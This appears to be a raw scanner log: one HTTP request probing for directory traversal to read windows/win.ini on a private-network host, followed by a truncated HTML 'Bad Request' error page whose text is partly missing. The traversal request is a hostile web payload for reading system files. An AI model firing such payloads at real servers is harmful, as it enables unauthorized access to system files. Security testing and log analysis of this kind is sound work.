GET /pte/./../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 192.168.203.178
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip




d: #d9edf7;  
      border-radius: 12px;
    }
    .content dl{
      color: #2d6a88;
      line-height: 40px;
    } 
    .content div div {
      padding-bottom: 20px;
      text-align:center;
    }
  </style>
</head>
<body>
  <div class="content">
      <div>
           <h1>HTTP 400 - Bad Request</h1>
        <dl>
          <dt></dt>
          <dt>1</dt>
		  <dd></dd>
          <dd>.</dd>
          <dt>2request header  cookie </dt>
		  <dd></dd>
          <dd>crtl+shift+delete cookie.</dd>
        </dl>
        <div>BUG <a href="https://www.xp.cn"  target="_blank">www.xp.cn</a> </div>
    
      </div>
    </div> 
</body>
</html>


